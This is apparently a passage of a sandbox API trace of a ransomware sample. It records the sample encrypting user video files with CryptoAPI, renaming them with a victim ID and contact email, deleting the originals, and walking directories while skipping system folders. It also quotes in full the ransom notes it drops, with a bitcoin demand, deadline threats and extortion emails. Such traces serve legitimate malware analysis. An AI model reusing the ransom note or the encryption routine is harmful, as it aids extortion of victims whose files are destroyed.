	[0199.405] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0199.405] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.405] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0199.405] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.405] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x13851, dwBufLen=0x13851 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x13860) returned 1
	[0199.407] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.407] RtlMoveMemory (in: Destination=0xff09e0, Source=0xfdd180, Length=0x13851 | out: Destination=0xff09e0) 
	[0199.408] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.408] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff09e0*, pdwDataLen=0x18bc0c*=0x13851, dwBufLen=0x13860 | out: pbData=0xff09e0*, pdwDataLen=0x18bc0c*=0x13860) returned 1
	[0199.408] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.408] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0199.408] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.409] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0199.409] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.409] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0199.409] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.409] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0199.409] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.409] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0199.410] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\pyf2.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 79
	[0199.410] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\pyf2.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\pyf2.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0199.410] WriteFile (in: hFile=0x2c0, lpBuffer=0xff09e0*, nNumberOfBytesToWrite=0x13860, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff09e0*, lpNumberOfBytesWritten=0x18c068*=0x13860, lpOverlapped=0x0) returned 1
	[0199.413] CloseHandle (hObject=0x2c0) returned 1
	[0199.413] CloseHandle (hObject=0x384) returned 1
	[0199.413] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\pyf2.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\pyf2.flv")) returned 1
	[0199.417] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\pyf2.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\pyf2.flv")) returned 0
	[0199.417] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad1db760, ftCreationTime.dwHighDateTime=0x1d967f3, ftLastAccessTime.dwLowDateTime=0xe22600c0, ftLastAccessTime.dwHighDateTime=0x1d97621, ftLastWriteTime.dwLowDateTime=0xe22600c0, ftLastWriteTime.dwHighDateTime=0x1d97621, nFileSizeHigh=0x0, nFileSizeLow=0x13851, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pYF2.flv", cAlternateFileName="")) returned 0
	[0199.417] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0199.417] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0199.418] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos") returned="C:\\Users\\RDhJ0CNFevzX\\Videos"
	[0199.418] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\*.*"
	[0199.418] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0199.418] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0199.418] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT") returned 56
	[0199.418] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0199.420] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0199.420] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0199.421] CloseHandle (hObject=0x380) returned 1
	[0199.421] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0199.421] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.421] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0199.422] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0199.422] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0199.422] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0199.422] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0199.422] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0199.422] CloseHandle (hObject=0x380) returned 1
	[0199.422] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0199.423] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0199.423] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0199.423] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML") returned 57
	[0199.423] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0199.424] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0199.424] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0199.426] CloseHandle (hObject=0x380) returned 1
	[0199.426] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.426] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0199.427] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.427] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0199.428] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0199.428] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0199.428] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0199.428] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0199.428] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0199.428] CloseHandle (hObject=0x380) returned 1
	[0199.429] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x90640556, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x90640556, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0199.429] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\*.*") returned 32
	[0199.429] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0199.429] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\*.*", cchLength=0x20 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\*.*") returned 0x20
	[0199.429] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.429] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="windows") returned 0x0
	[0199.429] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.430] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="boot") returned 0x0
	[0199.430] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.430] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="system volume information") returned 0x0
	[0199.430] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.430] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0199.430] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.430] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="temp") returned 0x0
	[0199.430] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.431] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="program files") returned 0x0
	[0199.431] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.431] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="program files (x86)") returned 0x0
	[0199.431] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.431] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="appdata") returned 0x0
	[0199.431] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.431] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="application data") returned 0x0
	[0199.431] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.431] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="winnt") returned 0x0
	[0199.432] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.432] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="tmp") returned 0x0
	[0199.432] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.432] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="cache") returned 0x0
	[0199.432] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.432] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="temporary internet files") returned 0x0
	[0199.432] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.432] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="webcache") returned 0x0
	[0199.432] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.433] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="inetcache") returned 0x0
	[0199.433] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.433] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="nvidia") returned 0x0
	[0199.433] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.433] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="packages") returned 0x0
	[0199.433] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.433] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="cookies") returned 0x0
	[0199.433] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.434] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="programdata") returned 0x0
	[0199.434] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0199.434] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0199.434] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x90640556, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x90640556, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0199.434] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0199.434] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x905a81ba, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x905a81ba, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x905cde9a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x62f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5ynswxxlgy9gvmdmwup.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="5YNSWX~1.SCL")) returned 1
	[0199.434] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ec9c4f0, ftCreationTime.dwHighDateTime=0x1d97226, ftLastAccessTime.dwLowDateTime=0x88c13ec0, ftLastAccessTime.dwHighDateTime=0x1d972a0, ftLastWriteTime.dwLowDateTime=0x88c13ec0, ftLastWriteTime.dwHighDateTime=0x1d972a0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9irupr75kfHemEUcFkFJ", cAlternateFileName="9IRUPR~1")) returned 1
	[0199.434] lstrcmpW (lpString1="9irupr75kfHemEUcFkFJ", lpString2="..") returned 1
	[0199.434] lstrcmpW (lpString1="9irupr75kfHemEUcFkFJ", lpString2=".") returned 1
	[0199.434] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos") returned="C:\\Users\\RDhJ0CNFevzX\\Videos"
	[0199.434] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\"
	[0199.435] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\", lpString2="9irupr75kfHemEUcFkFJ" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ"
	[0199.435] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ"
	[0199.435] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\"
	[0199.435] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\"
	[0199.435] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\*.*"
	[0199.435] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ec9c4f0, ftCreationTime.dwHighDateTime=0x1d97226, ftLastAccessTime.dwLowDateTime=0x88c13ec0, ftLastAccessTime.dwHighDateTime=0x1d972a0, ftLastWriteTime.dwLowDateTime=0x88c13ec0, ftLastWriteTime.dwHighDateTime=0x1d972a0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0199.435] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\*.*") returned 53
	[0199.435] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0199.435] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\*.*", cchLength=0x35 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*") returned 0x35
	[0199.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.436] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="windows") returned 0x0
	[0199.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.436] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="boot") returned 0x0
	[0199.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.436] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="system volume information") returned 0x0
	[0199.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.436] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0199.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.437] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="temp") returned 0x0
	[0199.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.437] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="program files") returned 0x0
	[0199.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.437] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="program files (x86)") returned 0x0
	[0199.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.437] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="appdata") returned 0x0
	[0199.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.437] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="application data") returned 0x0
	[0199.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.438] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="winnt") returned 0x0
	[0199.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.438] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="tmp") returned 0x0
	[0199.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.438] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="cache") returned 0x0
	[0199.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.438] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="temporary internet files") returned 0x0
	[0199.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.439] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="webcache") returned 0x0
